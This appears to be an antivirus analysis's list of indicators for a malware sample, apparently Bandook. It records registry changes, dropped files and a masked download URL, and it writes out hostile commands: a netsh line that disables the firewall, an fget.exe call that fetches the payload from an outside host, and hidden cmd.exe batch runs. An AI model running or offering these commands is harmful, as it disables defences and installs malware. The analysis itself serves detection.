Technical Information
- [<HKLM>\System\CurrentControlSet\Services\IKEEXT] 'Start' = '00000002'
- '%WINDIR%\syswow64\netsh.exe' firewall set opmode disable
- %LOCALAPPDATA%\iepv.exe
- %LOCALAPPDATA%\fget.exe
- %WINDIR%\temp\a00996.bat
- %TEMP%\bandook_merretich.exe
- %LOCALAPPDATA%\bandook_merretich.exe
- http://yo###rnet.de/wbblite/images/avatars/bandook_merretich.exe
- DNS ASK yo###rnet.de
- '%LOCALAPPDATA%\fget.exe' http://yo###rnet.de/wbblite/images/avatars/bandook_merretich.exe
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Temp\a00996.bat" "<Full path to file>" "' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ""%WINDIR%\Temp\a00996.bat" "<Full path to file>" "